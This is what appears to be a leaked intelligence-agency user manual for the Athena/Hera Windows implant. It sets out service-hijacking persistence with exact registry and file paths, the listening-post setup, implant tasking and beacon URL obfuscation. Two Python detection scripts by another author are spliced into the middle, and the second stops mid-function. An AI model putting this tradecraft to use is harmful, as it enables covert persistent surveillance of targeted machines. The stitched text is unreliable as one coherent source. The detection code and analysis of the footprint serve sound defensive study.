Athena V1 0 User Guide

SECRET//NOFORN

Engineering Development Group

Athena / Hera
Version 1.0
User Manual
29 February 2016
Classified By: 2127215
Reason: 1.4(c)
Declassify On: 25X1, 20640205
Derived From: CIA NSCG MET S-06

CHANGE LOG
Doc Rev | Doc Date   | Rev By | Change Description | Reference | Authority/Approval Date
        | 11/19/2015 | ATI    | Initial creation   |           |


TABLE OF CONTENTS
ATHENA / HERA.........................................................................................................................I
VERSION 1.0.................................................................................................................................I
USER MANUAL...........................................................................................................................I
1. (U) SCOPE..................................................................................................................................1
2. (U) SYSTEM OVERVIEW.......................................................................................................1
3. (S//NF) ATHENA/HERA CONCEPT OF OPERATION (CONOP)....................................2
3.1 (U) SUMMARY OF CAPABILITIES............................................................................................3
4. (S//NF) SYSTEM VERSIONS..................................................................................................3
4.1 (S//NF) ATHENA.....................................................................................................................3
4.2 (S//NF) HERA.........................................................................................................................4
4.3 (S//NF) ATHENA/HERA VERSION COMPARISON....................................................................5
5. (U) LISTENING POST.............................................................................................................5
5.1 (U) INSTALLATION.................................................................................................................6
5.2 (U) CONFIGURATION..............................................................................................................9
5.3 (U) MANAGEMENT...............................................................................................................10
6. (U) BUILDER..........................................................................................................................11
6.1 (U) USAGE............................................................................................................................11
6.2 (U) COMMAND LINE OPTIONS.............................................................................................12
6.3 (U) WIZARD........................................................................................................................13
6.4 (U) CONFIGURATION............................................................................................................15
6.5 (U) OUTPUT..........................................................................................................................19
7. (U) IMPLANT INSTALLATION..........................................................................................23
7.1 (U) OVERT INSTALLATION ON DISK MODE.........................................................................23
7.2 (U) RANDOM ACCESS MEMORY-ONLY (RAM-ONLY) MODE.............................................23
7.3 (U) IMPLANT OFFLINE INSTALLATION................................................................................23
8. (U) TASKER............................................................................................................................25
8.1 (U) USAGE............................................................................................................................26
8.2 (U) COMMAND LINE OPTIONS.............................................................................................26
8.3 (U) USER INTERFACE...........................................................................................................28
8.4 (U) USER INTERFACE EXAMPLE..........................................................................................34
8.5 (U) OUTPUT..........................................................................................................................36

9. (U) PARSER.............................................................................................................................36
9.1 (U) USAGE............................................................................................................................37
9.2 (U) COMMAND LINE OPTIONS.............................................................................................37
9.3 (U) PROCESSING RESPONSES AND SAFETIES........................................................................38
9.4 (U) OUTPUT..........................................................................................................................38
9.5 (S//NF) ERROR CODES........................................................................................................41
10. (U) NOTES AND OBSERVATIONS...................................................................................42
10.1 (U) INSTALLATIONS OF HERA REQUIRE A REBOOT FOR ELEVATED ACCESS PRIVILEGES 42
10.2 (U) INSTALLER AND RAM_ONLY VERSIONS SHOULD NEVER BE RUN FROM DISK.......42
10.3 (U) BUILDER DOES NOT PRODUCE A “BIT COPY” OF AN EXISTING CONFIGURED IMPLANT..........42
10.4 (U) OFFLINE INSTALLER MAY REPORT A FALSE FAILURE ON WINDOWS 10 INSTALLATIONS..........42
10.5 (S//NF) TIMEOUTS MAY OCCUR WHILE PROCESSING LARGE FILES..................................42
11. (U) ACRONYMS / ABBREVIATIONS...............................................................................43

LIST OF FIGURES
FIGURE 1 – (S//NF) ATHENA/HERA CONCEPT OF OPERATION...................................2
FIGURE 2 - (S//NF) LISTENING POST DIRECTORY HIERARCHY.................................6
FIGURE 3 - (S//NF) UBUNTU REPOSITORY LISTING EXAMPLE...................................6
FIGURE 4 - (S//NF) OPTIONAL SSL CERTIFICATE CREATION.....................................6
FIGURE 5 - (S//NF) FAILED SETUP.PY SCRIPT OUTPUT.................................................7
FIGURE 6 - (S//NF) PIP OUTPUT FOR MANUAL BOTTLE INSTALL..............................7
FIGURE 7 - (S//NF) COMPLETING SETUP.PY SCRIPT OUTPUT.....................................8
FIGURE 8 - (S//NF) LISTENING POST CONFIGURATION FILE......................................9
FIGURE 9 - (S//NF) BUILDER COMMAND LINE OPTIONS.............................................12
FIGURE 10 - (S//NF) SYSTEM BINARY PATH.....................................................................13
FIGURE 11 - (S//NF) BUILDER WIZARD REVIEW............................................................15
FIGURE 12 - (S//NF) EXAMPLE RECEIPT FILE - XML....................................................22
FIGURE 13 - (S//NF) BUILDER OUTPUT FILES..................................................................22
FIGURE 14 - (S//NF) WINDOWS OFFLINE INSTALLER...................................................24
FIGURE 15 - (S//NF) LINUX OFFLINE INSTALLATION...................................................25
FIGURE 16 - (S//NF) TASKER COMMAND LINE OPTIONS.............................................26

FIGURE 17 - (S//NF) TASKER MAIN MENU........................................................................28
FIGURE 18 - (S//NF) TASKER SHELL INTERFACE EXAMPLE – PART 1....................35
FIGURE 19 - (S//NF) TASKER SHELL INTERFACE EXAMPLE – PART 2....................35
FIGURE 20 - (S//NF) PARSER COMMAND LINE OPTIONS.............................................37


LIST OF TABLES
TABLE 1 - (U) APPLICABLE DOCUMENTS..........................................................................1
TABLE 2 - (S//NF) ATHENA SYSTEM COMPONENTS........................................................1
TABLE 3 - (U) INSTALLED FILE AND REGISTRY RESOURCES.....................................3
TABLE 4 - (U) INSTALLED FILE AND REGISTRY RESOURCES.....................................4
TABLE 5 - (S//NF) DIFFERENCES BETWEEN VERSIONS.................................................5
TABLE 6 - (S//NF) SIMILARITIES BETWEEN VERSIONS.................................................5
TABLE 7 - (S//NF) STEP-BY-STEP IMPLANT CONFIGURATION INSTRUCTIONS...15
TABLE 8 - (S//NF) REQUIRED OFFLINE INSTALLER COMPONENTS........................25
TABLE 9 – (U) COMMAND FILE ENCODING.....................................................................36
TABLE 10 - (U) ERROR CODES..............................................................................................41
TABLE 11 - (U) ACRONYMS AND ABBREVIATIONS.......................................................43


1. (U) Scope
(U) This document establishes the User Guide for Athena v1.0 and for Hera v1.0. See Section 4
for a discussion of the specific characteristics of each system.
Table 1 - (U) Applicable Documents
Description                                        | Date        | Version
Athena v1.0 User Requirement Document – OPS0001051 | 3-Feb-2016  | REV G
Hera v1.0 User Requirement Document – OPS0001743   | 15-Feb-2016 | REV B
Athena v1.0 IV&V Report                            | TBS         | TBS

2. (U) System Overview
(S//NF) The Athena System fulfills COG/NOD's need for a remote beacon/loader. Table 2 shows
the system components available in Athena/Hera v1.0. The target computer operating systems
are Windows XP Pro SP3 32-bit (Athena only), Windows 7 32-bit/64-bit, Windows 8.1 32-bit/64-bit,
Windows 2008 Enterprise Server, Windows 2012 Server, and Windows 10. Ubuntu v14.04 is the
validated Linux version. Apache 2.4 is the validated web server for the Listening Post.
Table 2 - (S//NF) Athena System Components
Component / Application | Function | Operating System | Language Used
Builder | Provides the ability to build packages for specified targets (e.g. installers, offline scripts, ram-only modules and receipts). | Linux / Windows | Python 3.4
Tasker | Provides the ability to task a specific implant (e.g. get, put, set, memload, memunload, delete and uninstall). | Linux / Windows | Python 3.4
Parser | Provides the ability to decode responses from the target. | Linux / Windows | Python 3.4
Listening Post | Provides interaction with the remote target. All batch tasking files are copied to this server for processing. | Linux (Apache) | Python 3.4
Installer | Installs the tool onto the target system (DLL file). | Windows x86/x64 | C++
RamOnly | Executes a diskless version of the implant as a DLL on the target system (DLL file). | Windows x86/x64 | C++
OffLine | Installs the tool onto the target system with physical access using Linux Boot or Windows Recovery Console. | Linux / Windows x86/x64 | bash/C++


3. (S//NF) Athena/Hera Concept of Operation (CONOP)

Figure 1 – (S//NF) Athena/Hera Concept of Operation
(S//NF) Figure 1 depicts the Athena Concept of Operation. The Athena/Hera system consists of a
Builder, Tasker, Parser, Listening Post, Installer, ramonly and offline capabilities.
(S//NF) The operator uses the Builder (builder.py) to tailor an implant for the specific
operational scenario. The operator then deploys the configured implant (Installer) on a target
computer.
(S//NF) Once activated, the Installer will modify the target registry and drop the host file
(IprCache.dll default) and data file (ras.cache default) in their specified locations. The
installation tool will restart the RemoteAccess service and launch the Athena Engine in the
netsvcs svchost.exe process. The installed tool will beacon to the Listening Post (LP) to receive
tasking.
(S//NF) The system also allows the Operator to configure certain behavior of the tool at runtime
during beacon events. The Tasker (tasker.py) is used to task the implant. The Parser
(parser.py) is used to decode the results retrieved from the Listening Post.
Note: (S//NF) The Installer must be executed as an Administrator or any other user account
with permissions to start/stop services, modify the registry and write to the system32
directory/subdirectories.


3.1 (U) Summary of Capabilities
(S//NF) The following is a summary of the system capabilities:
• Executes on the Windows XP (SP3)/7/8.1/2008/2012/10 (x86/x64) operating systems.
• Provides a beaconing capability that provides configuration and task handling
• Provides memory loading/unloading of NOD Persistence Specification DLLs on the
target system
• Provides delivery and retrieval of files to/from a specified directory on the target system
• Allows the operator to configure settings during runtime (while the implant is on target)

4. (S//NF) System Versions
(S//NF) The system was designed to allow a base installation (Athena) and an extended
installation (Hera). Both versions contain the full command set defined in this document. This
section will describe the differences between the implementations and configurations.

4.1 (S//NF) Athena
(S//NF) Athena is the primary implementation for use on WinXP through Win10 operating
systems. This implementation uses the RemoteAccess service for persistence, ZLIB for
compression and XTEA for encryption on disk.

4.1.1 (S//NF) On-Target Footprint
(S//NF) The Athena implant is compliant with the NOD Persistence Specification for persistent
DLLs and provides its own persistence mechanism. Athena will be hosted by the RemoteAccess
service. There is an external DLL that this service will load that is not a service DLL.
Table 3 - (U) Installed File and Registry Resources
File System Modification Location | Configuration Item | Description
%SystemRoot%\System32\Microsoft\Crypto\RAS\iprcache.dll | TARGET_FILENAME | The overt target file location on disk that is referenced by the RemoteAccess service.
%SystemRoot%\System32\CodeIntegrity\ras.cache | DATA_FILENAME | The overt data file location on disk that contains the package file (config, engine, etc.).
SYSTEM\CurrentControlSet\Services\RemoteAccess\RouterManagers\IP (Start = 2, Type = 20) | DLLPath | This overt registry entry forces the RemoteAccess service to load the target DLL before loading the true support DLL.
SYSTEM\CurrentControlSet\Services\RasMan (Start = 2, Type = 20) | None | This overt registry entry is updated to allow this dependent service to start when the RemoteAccess service starts.
SYSTEM\CurrentControlSet\Services\SStpSvc (Start = 2, Type = 20) | None | This overt registry entry is updated to allow this dependent service to start when the RemoteAccess service starts.
SYSTEM\CurrentControlSet\services\RemoteAccess\RouterManagers\Ip, DLLPath = %SystemRoot%\System32\iprtrmgr.dll | None (Windows10 Only) | Used by RemoteAccess Service
SYSTEM\CurrentControlSet\services\RemoteAccess\RouterManagers\Ip, GlobalInfo = | None (Windows10 Only) | Used by RemoteAccess Service
SYSTEM\CurrentControlSet\services\RemoteAccess\RouterManagers\Ip, ProtocolId = 0x00000021 | None (Windows10 Only) | Used by RemoteAccess Service

4.2 (S//NF) Hera
(S//NF) Hera is a secondary implementation for Windows 8 through Windows 10. The output
receipt file will contain a special key 1 in the XML file. This
implementation uses the Dnscache service for persistence, BZIP2 for compression and AES 256
for encryption on disk.

4.2.1 (S//NF) On-Target Footprint
(S//NF) The Hera implant is compliant with the NOD Persistence Specification for persistent
DLLs and provides its own persistence mechanism. Hera will be hosted by the DNSClient service.
There is an external DLL that this service will load that is not a service DLL.

Table 4 - (U) Installed File and Registry Resources
File System Modification Location | Configuration Item | Description
%SystemRoot%\System32\Microsoft\Crypto\DNS\dnscache.dll | TARGET_FILENAME | The overt target file location on disk that is referenced by the Dnscache service.
%SystemRoot%\System32\CodeIntegrity\dns.cache | DATA_FILENAME | The overt data file location on disk that contains the package file (config, engine, etc.).
SYSTEM\CurrentControlSet\Services\Dnscache (Start = 2, Type = 20) | Parameters\extension | This overt registry entry forces the Dnscache service to load the target DLL before loading the true support DLL.
SYSTEM\CurrentControlSet\Services\Dnscache | ImagePath | %SystemRoot%\system32\svchost.exe -k netsvcs
SYSTEM\CurrentControlSet\Services\Dnscache | ObjectName | LocalSystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost | Netsvcs | Ensure that the dnscache service is included on the list of netsvcs.

4.2.2 (U) Installation Notes
(S//NF) The installation will hijack the Dnscache service. On Windows 7 and 8, this service runs
in a netsvcs instance by default, but on Windows 8.1 and Windows 10 it runs as NetworkService.
The NetworkService user context has reduced security capability on the system. Due to the
svchost implementation, the service will only run in the netsvcs context at the next reboot. To
account for this deficiency and still provide immediate execution after installation, the
existing service will run as NetworkService until the next reboot, at which time the System
user netsvcs will be engaged.
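
As an added defensive illustration that is not part of the original manual, the following Python rule set checks a host snapshot against the file and registry footprint listed in Tables 3 and 4 for both versions. The snapshot format, the constructed sample values, and the assumption that the stock RouterManagers\Ip DLLPath is the iprtrmgr.dll path from Table 3 are mine; a real collector would feed it paths and registry values exported from the host.

```python
import re
from dataclasses import dataclass

# Paths and registry values taken from Tables 3 and 4 (Athena and Hera footprints).
# %SystemRoot% is kept as a literal token so the rules are drive-independent.
ATHENA_FILES = {
    r"%systemroot%\system32\microsoft\crypto\ras\iprcache.dll": "Athena TARGET_FILENAME",
    r"%systemroot%\system32\codeintegrity\ras.cache": "Athena DATA_FILENAME",
}
HERA_FILES = {
    r"%systemroot%\system32\microsoft\crypto\dns\dnscache.dll": "Hera TARGET_FILENAME",
    r"%systemroot%\system32\codeintegrity\dns.cache": "Hera DATA_FILENAME",
}
ROUTER_IP_KEY = r"system\currentcontrolset\services\remoteaccess\routermanagers\ip"
DNSCACHE_KEY = r"system\currentcontrolset\services\dnscache"
DNSCACHE_PARAMS_KEY = DNSCACHE_KEY + r"\parameters"
# Assumption: the stock support DLL is the iprtrmgr.dll path shown in Table 3,
# so any other DLLPath value means the router manager DLL has been redirected.
STOCK_DLLPATH = r"%systemroot%\system32\iprtrmgr.dll"


@dataclass(frozen=True)
class Finding:
    family: str     # "Athena" or "Hera"
    severity: str   # "high" or "medium"
    detail: str


def _norm(path: str) -> str:
    """Lower-case and collapse doubled backslashes so comparisons are robust."""
    return re.sub(r"\\+", r"\\", path.strip()).lower()


def assess_host(files, registry):
    """Evaluate a host snapshot against the Athena/Hera footprint.

    files:    iterable of file paths that exist on the host
    registry: dict mapping a key path under HKLM to {value_name: data}
    Returns a list of Finding objects; an empty list means no indicator matched.
    """
    present = {_norm(p) for p in files}
    reg = {_norm(k): {v.lower(): str(d) for v, d in vals.items()}
           for k, vals in registry.items()}
    findings = []

    # File indicators: the overt host and data files are the strongest signal.
    for table, family in ((ATHENA_FILES, "Athena"), (HERA_FILES, "Hera")):
        for path, label in table.items():
            if path in present:
                findings.append(Finding(family, "high", f"{label} present: {path}"))

    # Athena: RouterManagers\Ip DLLPath redirected away from the stock support DLL.
    dllpath = reg.get(ROUTER_IP_KEY, {}).get("dllpath")
    if dllpath is not None and _norm(dllpath) != STOCK_DLLPATH:
        findings.append(Finding("Athena", "high", f"RouterManagers\\Ip DLLPath = {dllpath}"))

    # Hera: Parameters\extension set on Dnscache (Table 4), and the service re-pointed
    # at LocalSystem. The latter is only medium: on Windows 7/8 Dnscache already runs
    # in netsvcs by default (Section 4.2.2), so it is weak evidence on its own.
    if "extension" in reg.get(DNSCACHE_PARAMS_KEY, {}):
        ext = reg[DNSCACHE_PARAMS_KEY]["extension"]
        findings.append(Finding("Hera", "high", f"Dnscache Parameters\\extension = {ext}"))
    if reg.get(DNSCACHE_KEY, {}).get("objectname", "").lower() == "localsystem":
        findings.append(Finding("Hera", "medium", "Dnscache ObjectName set to LocalSystem"))
    return findings


# Constructed sample snapshot resembling a Hera installation (not real telemetry).
# The data stored in Parameters\extension is assumed; the manual does not specify it.
SAMPLE_FILES = [
    r"%SystemRoot%\System32\CodeIntegrity\dns.cache",
    r"%SystemRoot%\System32\Microsoft\Crypto\DNS\dnscache.dll",
    r"%SystemRoot%\System32\svchost.exe",
]
SAMPLE_REGISTRY = {
    r"SYSTEM\CurrentControlSet\Services\Dnscache": {
        "ImagePath": r"%SystemRoot%\system32\svchost.exe -k netsvcs",
        "ObjectName": "LocalSystem",
    },
    r"SYSTEM\CurrentControlSet\Services\Dnscache\Parameters": {
        "extension": r"%SystemRoot%\System32\Microsoft\Crypto\DNS\dnscache.dll",
    },
    r"SYSTEM\CurrentControlSet\Services\RemoteAccess\RouterManagers\Ip": {
        "DLLPath": r"%SystemRoot%\System32\iprtrmgr.dll",
    },
}

if __name__ == "__main__":
    for f in assess_host(SAMPLE_FILES, SAMPLE_REGISTRY):
        print(f"[{f.severity}] {f.family}: {f.detail}")
```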


4.3 (S//NF) Athena/Hera Version Comparison
Table 5 - (S//NF) Differences between Versions
Feature | Athena | Hera
Hash (function names) | Adler hash – from zlib | Superfast hash
Mask (local encryption) | XTEA with key increment | AES with reduced key space
Packing Mask | 0x3B | 0x5C
String Mask | 0x5D8E1792 | 0xAF27D2C9
Compilation | MSVC 2013 | LLVM 3.7.0
Module Compilation (actual modules using alternate compilation) | Installer.dll, Host.dll, Ram_only.dll | Installer.bravo.dll, Host.bravo.dll, Ram_only.bravo.dll
Persistence | RemoteAccess | Dnscache
Compression | ZLIB | BZip2

Table 6 - (S//NF) Similarities between Versions
Feature | Commonality
Data file | File format and content is the same but the masking is different.
Business Logic | The command module uses different masking but the code is compiled with MSVC and will look similar. This module is dynamically loaded.
Engine | The engine module has mostly the same code between the two modules and is compiled with MSVC and will look similar. This module is dynamically loaded.
Uninstall | The uninstall module will be almost identical between versions. This module is dynamically loaded.
Imports | The import tables between (Installer/host/ram_only) will be similar. Additional unused imports have been included in the Hera version.
Communications | The communications between the versions has not changed (i.e., RSA with a generated session AES 256 key).
State File Logic | The state file logic is the same and the stored files may have similar information but will be masked differently on disk.
Function Ordering | No function abstractions have been incorporated between the versions. Functionally, these two versions should produce virtually the same function call list.

5. (U) Listening Post
(S//NF) The Listening Post (LP) uses a Bottle Python Web Framework WSGI interface to
simplify the Listening Post interface between the targets and the server. The tasker.py tool
generates encrypted tasking that is placed on the Listening Post for distribution to client targets.
The targets respond with an encrypted file that can be decrypted with the parser.py tool.
(S//NF) The Listening Post was designed to function as a simple file server to deliver tasking to
the target. The LP server was designed to run with Apache Server (2.4) running on Ubuntu
v14.04. Tasking files generated by the Tasker are placed into user configured directories
generated by the server setup script. The target will beacon into the LP for tasking and the LP
will respond by parsing client directories and sending back data from the corresponding
directory. The directory is organized in a single parent folder to multiple child folders specified
by the implant’s 4 character identifier. The directory hierarchy is laid out as follows:

ROOT folder
|---- server log files
|---- Parent ID folder (e.g., TEST)
|     |---- parent tasking files
|     |---- Child ID folder
|     |     |-- inbox folder (files received from the implant)
|     |     |     |- Responses and safety files
|     |     |-- outbox folder (files to be sent to the implant)
|     |           |- tasking files
|     |---- Child ID folder
|     ...
|---- Parent ID folder
...

Figure 2 - (S//NF) Listening Post Directory Hierarchy

5.1 (U) Installation
(S//NF) The Listening Post server setup is performed by the setup.py script. The python script
setup.py should be run on Ubuntu v14.04. The setup script will install all required files
automatically if an Ubuntu repository can be reached. The following is a list of required
packages:
• Apache 2.4
• Apache mod_wsgi module
• Python 3.4
• Python pip (only used to retrieve bottle)
• Python bottle web framework

(S//NF) Validate that the current Ubuntu instance has the correct repository location. This can be
validated by viewing the sources.list file.
> /etc/apt/sources.list
deb http://repo.devlan.net/ubuntu trusty main universe multiverse restricted
deb http://repo.devlan.net/ubuntu trusty-security main universe multiverse restricted
deb http://repo.devlan.net/ubuntu trusty-updates main universe multiverse restricted
deb http://repo.devlan.net/ubuntu trusty-backports main universe multiverse restricted

Figure 3 - (S//NF) Ubuntu Repository Listing Example
(S//NF) The SSL component of the install requires a valid SSL certificate. Selecting NO for the
option “use pre-existing SSL certificate and key” will generate a new certificate for you.
OpenSSL can also be used to generate a certificate. The following example shows how this can be
done.
> openssl genpkey -algorithm RSA -out a.key
> openssl req -new -key a.key -out a.req -subj /CN=1.1.1.1
> openssl x509 -req -in a.req -signkey a.key -out a.cert
> sudo apt-get update

Figure 4 - (S//NF) Optional SSL Certificate Creation
(S//NF) To run the installation tool from the current Ubuntu instance, copy the Listening Post
directory from the installation disk to the Ubuntu v14.04 instance. The Ubuntu v14.04 Linux
distribution already contains Python 3.4 pre-installed. Use the provided installation script to
complete the installation.

> sudo python3 setup.py -install
~/Desktop/listeningpost$ sudo python3 setup.py -install
Verifying packages are installed ...
Apache is not installed. Do you want to install? (Y/N) default: Y
Installing Apache...
Mod-wsgi is not installed. Do you want to install? (Y/N) default: Y
Installing Mod-wsgi...
Python-pip is not installed. Do you want to install? (Y/N) default: Y
Installing pip3...
Python Bottle is not installed. Do you want to install? (Y/N) default: Y
Installing Bottle...
Failed installed. Try manual install.
One or more install packages did not exist or failed. Continue? (Y/N) default: N
y
Copying files to /var/www/html
Server configuration file options:
Enter full path to tasking directory, i.e. /var/www/html/data:
Server configuration file options:
Enter full path to tasking directory, i.e. /var/www/html/data: ^CTraceback (most recent
call last):
File "setup.py", line 315, in 
install()
File "setup.py", line 42, in install
write_config()
File "setup.py", line 132, in write_config
root_dir = input("Enter full path to tasking directory, i.e. {}/data:
".format(www_dir))

Figure 5 - (S//NF) Failed setup.py Script Output
(S//NF) Should the install script fail to find bottle, the Operator must install bottle manually.
This condition can occur if a pip server cannot be found or if bottle is not installed on the pip
server. To support this situation, bottle has been included on the Listening Post distribution disk.
Use the following command to install bottle manually:
sudo pip3 install bottle/bottle-0.12.8.tar.gz
> sudo pip3 install bottle/bottle-0.12.8.tar.gz
Unpacking ./bottle-0.12.8.tar.gz
Running setup.py (path:/tmp/pip-0C2Zam-build/setup.py) egg_info for package from
file:///home/xxx/Desktop/listeningpost/bottle/bottle-0.12.8.tar.gz
Installing collected packages: bottle
Running setup.py install for bottle
changing mode of build/scripts-2.7/bottle.py from 644 to 755
changing mode of /usr/local/bin/bottle.py to 755
Successfully installed bottle
Cleaning up...

Figure 6 - (S//NF) pip Output for Manual Bottle Install
(S//NF) If the installation did not complete, it can be restarted to complete the installation.
> python3 setup.py -install

Verifying packages are installed ...
Copying files to /var/www/html
Server configuration file options:
Enter full path to tasking directory, i.e. /var/www/html/data:
Nothing was entered, using /var/www/html/data
/var/www/html/data does not exists, creating.
Enter name of inbound folder: IN

Enter name of outbound folder: OUT
Enter URL path of tasking resources (comma separated), i.e. /blog/comments, /php/id: /
Enter URL path of web resources (comma separated), i.e. /, /web: /html
Enabling mod-wsgi
Disabling default site.
Use pre-existing SSL certificate and key? (Y/N) default: N
Generating a 2048 bit RSA private key
......................+++
..+++
writing new private key to 'fileserver.key'
----You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
----Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
Moving cert to /etc/ssl/certs/fileserver.crt
Moving key to /etc/ssl/private/fileserver.key
Enabling SSL site 001-default-ssl.conf
Disabling port 80.
Restarting services...
Install done.

Figure 7 - (S//NF) Completing setup.py Script Output
(S//NF) After installing the required packages, the setup script will modify Apache to enable
SSL on port 443 and generate any required SSL keys and certificate if not supplied. In addition,
the setup script will ask to setup the directories where the tasking files will reside.
(S//NF) After installation is complete, make sure to check that the file/folder exists, proper
permissions have been applied, and Apache is successfully running on port 443. The setup script
expects a default installation of Apache 2.4. If any configuration files have been modified, the
setup script may not work correctly. You may have to manually modify
/etc/apache2/sites-available/001-default-ssl.conf to point to the correct location of your SSL
keys and certs. In addition, add the following line under DocumentRoot, to enable WSGI:
WSGIScriptAlias / /var/www/html/app.wsgi
(S//NF) The directory /var/www/html should contain three files; app.wsgi, server.py, and
config.json. To disable port 80, edit /etc/apache2/ports.conf and comment out the line with
"Listen 80".
(U) Some common Apache commands are listed below:
sudo a2enmod - to enable a module, i.e. sudo a2enmod wsgi
sudo a2dissite - to disable a site configuration
sudo a2ensite - to enable a site configuration
sudo service apache2 restart - restart Apache
sudo service apache2 start
sudo service apache2 stop
tail -f /var/log/apache2/access.log


5.2 (U) Configuration
(S//NF) The Listening Post instance can be configured with a local JSON encoded text file called
“config.json”. The setup script will write out a configuration file, config.json, as well as copy the
corresponding required Server python files to /var/www/html. The config.json file contains the
information generated by the setup script and is read by the Server python script on start-up. The
config.json can be edited manually to add/modify/delete any user updates; if edits are made, the
Apache server should be restarted to ensure everything is refreshed. The config.json contains:
{
"DATA_URLS": ["/blog/comm", "/php/id", "/"],
"ROOT_DIR": "/srv/athena",
"WEB_URLS": ["/html", "/", "/web"],
"OUT_FOLDER": "OUT",
"IN_FOLDER": "IN",
"HOST" : "0.0.0.0",
"PORT" : "",
"LOG_SIZE" : "65536",
"HTTP_ERROR_CODE" : 200
}

Figure 8 - (S//NF) Listening Post Configuration File
Warning: (S//NF) The values in DATA_URLS must contain the value configured in the Implant
Builder field, Beacon URL Path for LP. The values in WEB_URLS must contain the value
configured in the LP Builder field, URL Path for Web Resources.

1) DATA_URLS – This is the virtual URL path sent from the target to inform Apache to forward requests to
the Athena Listening Post.
2) ROOT_DIR - This is the root directory location where the parent folder must be created with the 4
character identifier configured for the target.
3) WEB_URLS – This value defines the URL path of web resource. This can be any URL path that you plan
on delivering normal web content (must not be the same as tasking URL path)
4) DATA_URLS - Tasking directory - this is the root directory location where the parent folder must be
created with the 4 character identifier configured for the target.
5) OUT_FOLDER - This folder contains the tasking files generated by the Tasker that will be sent to the
target for processing.
6) IN_FOLDER - This folder contains the files that the target will upload back to the LP for post-processing
by the Parser.
7) HOST – This is the NIC binding address. (default 0.0.0.0)
8) PORT – This value defines the web port. (default 443)
9) LOG_SIZE – This value defines the size of a single log file. (default 64K) By setting this value to zero, no
logging information will be stored. The server will store at most 5 backup logs in the current instance.
10) HTTP_ERROR_CODE – This value defines the error code returned to the target when an error occurs. It
is the responsibility of the system administrator to validate alternate return codes to support forwarding or
other capabilities.
HTTP Status codes for failure:
a) 407 - proxy authentication failed
b) 502, 504 - proxy or gateway failure
c) 600, 601, 602, 603 - squid error codes
d) All other status codes indicate a successful beacon.

SECRET//NOFORN

9

SECRET//NOFORN
________________________________________________________________________
Note
(U) URLs should start with a slash ("/") but should not have
an ending slash.

5.3 (U) Management
(S//NF) To specify initial tasking for a target (i.e., when the target first beacons to the LP), create
a folder on the LP with the parent ID. Place any generic tasking created for the family of targets
in this parent folder. When a new target beacons, the LP creates a child folder for the specific
child ID and copies the parent tasking into the child folder. The LP only copies the parent tasking
to the child folder once -- when the child folder is initially created. On subsequent beacons, all
tasking will be pulled directly from the child folder. The Operator must manually copy the
target’s specific tasking from the Tasker to the target’s OUT directory as well as move files
from the target’s IN directory for processing by the Parser tool.
(S//NF) If there is both parent and child tasking for a target, it will be processed in the following
order, based on the user-configured priority:
1. Child tasking
a. Non-persistent
b. Persistent
2. Parent tasking
a. Non-persistent
b. Persistent
Note
(S//NF) All child-specific tasking will take precedence over
any existing parent tasking.

5.3.1 (U) URL Query
(S//NF) To obfuscate the URL request and prevent caching, the target appends one of the following
templates, filled with random data, to each request. The following strings define the templates
for processing URL queries.
?keyword=%s&matchtype=p
?ping?clientid=%s
?event?a=%sy=false
?h.key=%s
?activityi;src=%s

5.3.2 (U) Request Headers
(S//NF) The request header will include user configured headers as well as default ones.
User Agent: (user-configured)
Accept: (user-configured)
Accept-Language: (user-configured)
Accept-Encoding: (user-configured)

Host: (user-configured domain beacon names)
Connection: keep-alive (default)
Cache-Control: private, no-cache, no-store, max-age=0\r\n (default)
Cookie: session-id= (default parent ID and generated child ID masked with a generated key)
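As an added detection example (not part of the manual), the following Python scans constructed Apache-style access log lines for the five query templates of section 5.3.1 and checks a request's header set for the default traits listed in section 5.3.2; the log lines, the header set and all function names are constructed for the example.

```python
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# The five query templates from section 5.3.1; the implant replaces %s with random data.
QUERY_TEMPLATES = [
    "?keyword=%s&matchtype=p",
    "?ping?clientid=%s",
    "?event?a=%sy=false",
    "?h.key=%s",
    "?activityi;src=%s",
]


def template_to_regex(template: str) -> "re.Pattern[str]":
    """Build an anchored regex from a %s template; the single group captures the random filler."""
    literal_parts = [re.escape(part) for part in template.split("%s")]
    return re.compile("^" + "(.+?)".join(literal_parts) + "$")


QUERY_PATTERNS = [(t, template_to_regex(t)) for t in QUERY_TEMPLATES]


def match_query(url: str) -> Optional[Tuple[str, str]]:
    """Return (template, filler) if everything from the first '?' onward fits one template."""
    # A normal query-string parser would stop at the first '?', which breaks '?ping?clientid='.
    qpos = url.find("?")
    if qpos < 0:
        return None
    query = url[qpos:]
    for template, pattern in QUERY_PATTERNS:
        m = pattern.match(query)
        if m:
            return template, m.group(1)
    return None


# Apache combined-log request line: client ident user [time] "METHOD URL HTTP/x.y" status bytes
_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Flag log lines whose query string is one of the beacon templates."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, start=1):
        m = _LOG_RE.match(line)
        if not m:
            continue
        found = match_query(m.group("url"))
        if found:
            template, filler = found
            hits.append({"line": lineno, "client": m.group("client"), "method": m.group("method"),
                         "url": m.group("url"), "template": template, "filler": filler})
    return hits


def beacons_per_client(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Count template hits per source address; one host cycling through templates stands out."""
    return dict(Counter(str(h["client"]) for h in hits))


def beacon_header_indicators(headers: Dict[str, str]) -> List[str]:
    """Traits of the default request headers (section 5.3.2); each is weak alone, stronger together."""
    h = {k.lower(): v for k, v in headers.items()}
    found = []
    # Browsers send content-codings here (gzip, deflate, br); application/octet-stream is a media type.
    if h.get("accept-encoding", "").strip().lower() == "application/octet-stream":
        found.append("accept-encoding is application/octet-stream")
    # The default cookie name that carries the masked parent/child ID.
    if re.search(r"(^|;\s*)session-id=", h.get("cookie", "")):
        found.append("cookie named session-id")
    # 'private' is a response-only Cache-Control directive; browsers do not send it in requests.
    directives = {d.strip().lower() for d in h.get("cache-control", "").split(",")}
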